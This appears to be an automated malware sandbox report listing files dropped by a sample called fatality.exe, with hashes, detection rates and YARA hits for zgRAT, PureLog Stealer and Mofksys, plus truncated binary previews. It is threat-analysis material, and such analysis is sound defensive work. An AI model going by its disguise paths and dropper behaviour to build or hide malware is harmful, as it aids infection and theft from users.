                                                                                                                                                          SHA1:A0D07C2802630C81FD804DDF501F6F6605A30B2D
                                                                                                                                                          SHA-256:724F6AD6BD4E72EAB6461CAC513C5F76AA96D85753219B644F40D5A02C396F98
                                                                                                                                                          SHA-512:9AF623E3F1407BC4E4896B6B4343789F0BE7D4113FDBFCAE7FE7C3005BE16A0537772F36569AAACC0959343DA6AD8DD0D121714DB84717419C3005C9FB41F26B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0150719828554693
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXJkmltt9Xblt59Xh9XR5+1lf35X:rl3b/VFQJkWbltD7Ovf5
                                                                                                                                                          MD5:989CD58B0A45643D3D2766B2FBD8AA82
                                                                                                                                                          SHA1:364C3A83FDEB9CF96E5B1C68B195EA3B4A0A1951
                                                                                                                                                          SHA-256:79AC80B312DDE02284296E160790D58287EF2833E5CA7B3A9793EF3BECBD5D60
                                                                                                                                                          SHA-512:9E4C4110CE06FA2F6B418B22C2DB17C15EE620CAF64BB91FBED36A8D9C3F0CF639A6413612D240AB409FACD02CCFBDF440DB72C961A3BF3B8C6F4AD8F99C1FF9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0149379474325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXyt9Xblt59Xh9XR5+1lf35X:rl3b/VFQqbltD7Ovf5
                                                                                                                                                          MD5:981D466F9DD335B309B132B77E7380F5
                                                                                                                                                          SHA1:5D4828023D35BB2FE20520C8EE7A379CD052CB4B
                                                                                                                                                          SHA-256:C7E612EDC352A0614B3CE7C04CF2E572D3B79DCC569DDAAFC2A2CBD673D120C2
                                                                                                                                                          SHA-512:3310377531D3B7808BD69E594FD9B3B8FA7187996A8A02F4BF5C14D9CBBDCCEFF6C6CC10849FD3780D098CEEE0EC2BD08684F01C27D1027147640EC47A1BCD98
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16384
                                                                                                                                                          Entropy (8bit):0.4022769148265937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                                                                                                                                          MD5:1E6AF6327736E3508F1C50506326C220
                                                                                                                                                          SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                                                                                                                                          SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
                                                                                                                                                          SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: fatality.exe, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (391), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):391
                                                                                                                                                          Entropy (8bit):5.862603068110846
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:ZwGSAtgvT3df+I69R/IpPRin9XnwPsL13nTTuPYUfDPsVQbhXVU63zpBwbxEQ:iGXtUf+I6UpinFwkLQPPL0uZDweQ
                                                                                                                                                          MD5:6C771D221991C6283054FE2D277778D1
                                                                                                                                                          SHA1:FB4A74464D44805B3DF2BE88C1AF4ADEB5003167
                                                                                                                                                          SHA-256:51932F49A1C96C94FB623FB1866687C247FF6C1FB5CC7613D59A214B53308171
                                                                                                                                                          SHA-512:B0543A58C33BCE0D614F0DAD2B8E861769D2EFAC6F0E50A6FF2E143EAD874AD48FC88E3FE9359273A0EA02CCB048A21EDC552BB76A2B10F001233FD6B04C658B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):23552
                                                                                                                                                          Entropy (8bit):5.519109060441589
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                          • Antivirus: Virustotal, Detection: 11%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: SearchIndexer.exe, Detection: malicious
                                                                                                                                                          • Filename: fatality.exe, Detection: malicious
                                                                                                                                                          • Filename: OneDriveStandaloneUpdater.exe, Detection: malicious
                                                                                                                                                          • Filename: VIyu4dC9CU.exe, Detection: malicious
                                                                                                                                                          • Filename: OisrvsB6Ea.exe, Detection: malicious
                                                                                                                                                          • Filename: ntoskrnl2.exe, Detection: malicious
                                                                                                                                                          • Filename: top.exe, Detection: malicious
                                                                                                                                                          • Filename: DC86.exe, Detection: malicious
                                                                                                                                                          • Filename: WinPerfcommon.exe, Detection: malicious
                                                                                                                                                          • Filename: Udzp7lL5ns.exe, Detection: malicious
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):85504
                                                                                                                                                          Entropy (8bit):5.8769270258874755
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                          • Antivirus: Virustotal, Detection: 69%
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):33792
                                                                                                                                                          Entropy (8bit):5.541771649974822
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32256
                                                                                                                                                          Entropy (8bit):5.631194486392901
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3319076
                                                                                                                                                          Entropy (8bit):7.783232715391711
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:hb5Nf/dq7yqKM1TcGZ6gtq1/Lko4uVa8Nb:FMyqKM1TogtqT44NNb
                                                                                                                                                          MD5:A7040B85FC683F088F4C6E5B44052C43
                                                                                                                                                          SHA1:7E3D644D1A1FB7B9BCCCB6406D2E7FBD062EAE66
                                                                                                                                                          SHA-256:B786F31F1C89C71D0510BBD32510595D9891C67DB516F968261B02594A423A8D
                                                                                                                                                          SHA-512:E225F6F7E114690AAD25E9C67460E50F5B84CC8CA87A69BA94FF63AB42415DF176A3ED6C3456CDDB849927604A4888B17E5E781AC97D2BA0197F9687BBB2C301
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Desktop\fatality.exe , Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Desktop\fatality.exe , Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32768
                                                                                                                                                          Entropy (8bit):5.645950918301459
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):69632
                                                                                                                                                          Entropy (8bit):5.932541123129161
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                          Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):138366
                                                                                                                                                          Entropy (8bit):5.825787831277215
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVZX:UVqoCl/YgjxEufVU0TbTyDDalXX
                                                                                                                                                          MD5:7E24D6E5185E961528CFBCC6840EBBE9
                                                                                                                                                          SHA1:175DC72F78382FBB68361DE083A9E1B327A5280D
                                                                                                                                                          SHA-256:F8F72A6C6BDEA3733CCB70283DB5B95FE161080F1ECA2364E3C576D8906EBA15
                                                                                                                                                          SHA-512:8906A4BF4F8DA2CF8211B38F699654AA3A73D866B9E5119A382B75A3E91E6E7ACEF5BD88A30499ADB8CE5DF192BAEFA007A38269916EF4C53D7B734C5BD3E234
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):138518
                                                                                                                                                          Entropy (8bit):5.843329840311764
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVZAlllllllllllle:UVqoCl/YgjxEufVU0TbTyDDalXv
                                                                                                                                                          MD5:D36CC2935AE0E7A5D2936DB589A9B8CC
                                                                                                                                                          SHA1:082BD58C0AD60FA4783B63A4F681A5C5FAD8E1A6
                                                                                                                                                          SHA-256:4C93ADB50768FEB3CDEA95F1FEDC5D6FDC262D59F12C4B66601D377E2709C2E3
                                                                                                                                                          SHA-512:547452BA0DE7C8EBEEC8E4BB2D916C7A881B6743E6D1FB6D2761A202B7CF5BB30C3F541957DE70C584B46B7171F3F20338B4985341829B408C366AEAECED9290
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):138480
                                                                                                                                                          Entropy (8bit):5.834248021973514
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVZJ:UVqoCl/YgjxEufVU0TbTyDDalXJ
                                                                                                                                                          MD5:DA56FBDFF5925EFBA1E9942139E2A354
                                                                                                                                                          SHA1:E6A3EEA3DFD640B299C3A1171BF1B40A6A6E137E
                                                                                                                                                          SHA-256:70C903741D63FE1D7323334677FA2A3229F674EB2BF5711ECCBF04D50844447F
                                                                                                                                                          SHA-512:B3F8AC8AA281F34431B77DCDA528D9E50E71956847348A37C3804A9CC849D5E7ADDC0480C4513D5300E37733766DA027B6B248882F337B8C4688C53C589F10BB
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):138449
                                                                                                                                                          Entropy (8bit):5.854750064478844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:UVqoCl/YgjxEufVU0TbTyDDalXx++++++++++++++++++++++++++++++++++++f:UsLqdufVUNDab
                                                                                                                                                          MD5:5020DD008EA5092AFC4BBD7961322484
                                                                                                                                                          SHA1:50CCECF527CD22933722507FBC8F51963A6920F4
                                                                                                                                                          SHA-256:D7CA77A7512F7CD750D6FBA25CA790C78F1CAE373B4B9DFB4E684999EBFEFE38
                                                                                                                                                          SHA-512:71ADEBF6E5CF067BFAA6E988BF315D5D4F6C92E53BB9184ADDA4A6AB928CD5DEF21818AE12CC0FE4EB1B03DE5309E3F44147E8B20B5B1BBDA8D8C5DBC65A2F35
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1224
                                                                                                                                                          Entropy (8bit):4.435108676655666
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4608
                                                                                                                                                          Entropy (8bit):3.918318902150946
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:6bpnPtaM7Jt8Bs3FJsdcV4MKe27fqP+1vqBH6OulajfqXSfbNtm:OPBPc+Vx9My+1vkkcjRzNt
                                                                                                                                                          MD5:BFFC32285DADFBAEE0F4D0B2C64857A8
                                                                                                                                                          SHA1:ECDF50CFD9EE05CF6B2C4C654964EDA7C66A40AE
                                                                                                                                                          SHA-256:1CCCF77FE72E59F18F67AA9B04DD6CC0AC94A366F865FA19842FAADC720A4041
                                                                                                                                                          SHA-512:B04594F7FD37187EA411399EEB23E2C4BF94FE1A7D029BE3254BE10F357C3E11FD1F8963894C8A471CCC47BBD3AB1CB9FADAFB0642EF126D7B92A2F7AE1461E1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (429), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):429
                                                                                                                                                          Entropy (8bit):5.869193506119993
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:IdO2K40TxP08Zscz8ZvWXoo5Pi6DabMKxNgR7An:zBp7pSWXoehuxyRU
                                                                                                                                                          MD5:B9374E4AAC8602506F3C7869C1FEE7DB
                                                                                                                                                          SHA1:139A7F3ED7CD38DB7EA618E9B10EE2F163CF531B
                                                                                                                                                          SHA-256:D856AE66A62C28A2020ACD64D488A6BBE84B94E45CEE4B2265A90705257209A2
                                                                                                                                                          SHA-512:368D3779978AE2D10506F17E34E168503797CF4BB3D66667D725E873846591BDD8AEA5E9918F8E9F7CEB21150B9C96A275B93BA5657EC426D9B32984047537A7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):240
                                                                                                                                                          Entropy (8bit):5.728728607437259
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:PN3XwQp/+PBS27OeGn5vos1AEgfAgcmLaoEO3ZnEzvAFemFTdAnGO:PRAEInuws1AEgfvpaoTZn0IsQRk
                                                                                                                                                          MD5:88172E4B3906BAFE1EB3E15E004F192C
                                                                                                                                                          SHA1:01FD28DC70720FC334E52A8FAD4FE81ECA26D389
                                                                                                                                                          SHA-256:05E3069BD1D9568477A4F6551C126B56943CADF57B15179098B9FC5E0F5AAAF1
                                                                                                                                                          SHA-512:76BAA23F20554CDD5C3D3AA1D160F1646BDE1A0CCAA8A59054CA53AAF283BE75C52D34A1EFC37E928672CBF144C87B3743593E9EC1D2107087E6A797C1029BE3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
